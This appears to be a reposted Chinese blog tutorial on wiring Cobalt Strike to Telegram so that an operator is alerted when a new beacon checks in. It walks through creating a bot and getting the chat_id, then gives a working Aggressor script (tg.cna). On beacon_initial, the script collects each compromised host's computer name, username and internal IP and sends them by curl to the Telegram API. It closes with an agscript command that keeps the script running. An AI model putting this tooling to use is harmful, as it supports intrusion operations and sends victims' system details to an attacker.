cobaltstrike配置tg上线提醒

一、在tg上申请一个Bot

参考链接:
https://zhuanlan.zhihu.com/p/30450761

回复"/newbot"开始创建你的bot，botfather会要求你输入bot的名字和bot用户名，bot名会显示在搜索界面，而bot的username在搜索bot和添加bot入group的时候会起作用（你无法通过搜索bot名来添加bot如群组）。username必须以bot或者_bot（不区分大小写）结尾：如ABCBot，ABC_bot。

二、讲bot加入一个tg组

三、访问如下网址

https://api.telegram.org/bot<你申请时的bottoken>/getUpdates
然后会获取加入group的chat_id

四、在cobaltstrike运行如下脚本

tg.cna

# author: dayu

# ------------ set these config: ------------
$bot_token = "xxxxxxx";
$chat_id = 'xxxxxxx'; # Write your group_id or user_id
$teamserver_hostname = 'HOSTNAME-1'; # You will reveive message containing it
# -------------------------------------------

$tg_bot_webhookURL = 'https://api.telegram.org/bot'.$bot_token.'/sendMessage';

$test_message = 'this is a test message, test success';
@curl_command = @('curl', '-X', 'POST', '--data-urlencode', 'chat_id='.$chat_id, '--data-urlencode', 'text='.$test_message, $tg_bot_webhookURL);
exec(@curl_command);

on beacon_initial {
    println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1, "pid"));
    local('$internalIP $computerName $userName');
    $internalIP = replace(beacon_info($1, "internal"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");
    $userName = replace(beacon_info($1, "user"), " ", "_");
    $message = 'Message from '.$teamserver_hostname.' Server%0aBeacon success implant Info Target:%0aComputer name : '.$computerName.'%0aUsername : '.$userName.'%0aIpaddres : '.$internalIP;
    @curl_command = @('curl', '-X', 'POST', '--data-urlencode', 'chat_id='.$chat_id, '--data', 'text='.$message, $tg_bot_webhookURL);
    exec(@curl_command);
}

填上chat_id和bot_token后运行如下命令

nohup ./agscript cs的IP cs的port user password tg.cna &

标签：上线,bot,curl,chat,cobaltstrike,tg,message,id
来源： https://www.cnblogs.com/sakura521/p/14907428.html